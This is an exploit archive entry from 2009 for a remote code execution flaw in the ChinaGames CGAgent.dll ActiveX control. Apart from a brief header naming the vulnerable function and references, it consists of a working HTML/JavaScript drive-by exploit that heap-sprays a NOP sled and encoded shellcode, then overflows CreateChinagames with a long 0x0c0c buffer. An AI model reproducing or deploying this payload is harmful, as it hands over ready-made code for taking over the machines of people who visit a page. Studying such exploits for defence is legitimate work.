chinagames-exec.txt
Posted on 22 May 2009
# # ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit # Exploit made by etirah # Download: www.chinagames.com # # Problem DLL : CGAgent.dll # Problem Func : CreateChinagames(param1) # Problem Param : param1 # # References: # 1. http://bbs.pediy.com/showthread.php?t=87615 # 2. http://www.milw0rm.com/exploits/8579 <html> <body> <object classid="clsid:75108B29-202F-493C-86C5-1C182A485C4C" id="target"></object> <script> function test() { var shellcode = unescape("u68fcu0a6au1e38u6368ud189u684fu7432u0c91uf48bu7e8du33f4ub7dbu2b04u66e3u33bbu5332u7568u6573u5472ud233u8b64u305au4b8bu8b0cu1c49u098bu698buad08u6a3du380au751eu9505u57ffu95f8u8b60u3c45u4c8bu7805ucd03u598bu0320u33ddu47ffu348bu03bbu99f5ube0fu3a06u74c4uc108u07caud003ueb46u3bf1u2454u751cu8be4u2459udd03u8b66u7b3cu598bu031cu03ddubb2cu5f95u57abu3d61u0a6au1e38ua975udb33u6853u6574u7473uc48bu6853u3a20u292du7468u2065u6820u6168u6972ud48bu5053u5352u57ffu53fcu57ffu00f8"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<300; x++) memory[x] = block + shellcode; var buffer = ''; while (buffer.length < 796 ) buffer+=unescape("%u0c0c"); target.CreateChinagames(buffer); } test(); </script> </body> </html>
